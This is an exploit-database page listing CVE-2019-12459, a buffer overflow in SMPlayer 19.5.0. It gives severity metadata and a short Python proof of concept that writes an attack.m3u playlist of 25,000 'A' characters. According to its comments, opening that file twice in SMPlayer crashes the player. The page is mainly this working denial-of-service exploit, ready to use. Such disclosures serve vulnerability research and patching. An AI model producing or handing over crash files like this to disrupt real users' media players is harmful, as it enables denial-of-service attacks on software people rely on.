Advertisement






SMPlayer 19.5.0 Buffer Overflow / Denial Of Service

CVE Category Price Severity
CVE-2019-12459 CWE-119 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2019-11-16
CPE
cpe:cpe:/a:smplayer_project:smplayer:19.5.0
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 0.018979 0.68239

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019110106

Below is a copy:

SMPlayer 19.5.0 Buffer Overflow / Denial Of Service
#!/usr/bin/python

# Title : SMPlayer Denial Of Service Buffer Overflow 19.5.0 32 bit
# Tested on : Windows 7 (64 bit)
# Vulnerable Software: SMPlayer v 19.5.0
# Exploit Author: Malav Vyas
# Twitter : @malav_vyas1
# Vendor Homepage: https://smplayer.info
# Version : 19.5.0
# Software Link : https://smplayer.info/en/downloads

# POC
# run this python file, which will generate attack.m3u file
# .m3u file is used as a playlist
# this python file will generate a .m3u file with 25000 "A" characters.
# Open this file in SMPlayer two times.
# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack.
# For more details, please refer to video

f="attack.m3u"

bof = "A"*25000

writeFile = open(f, "w")
writeFile.write(bof)
writeFile.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum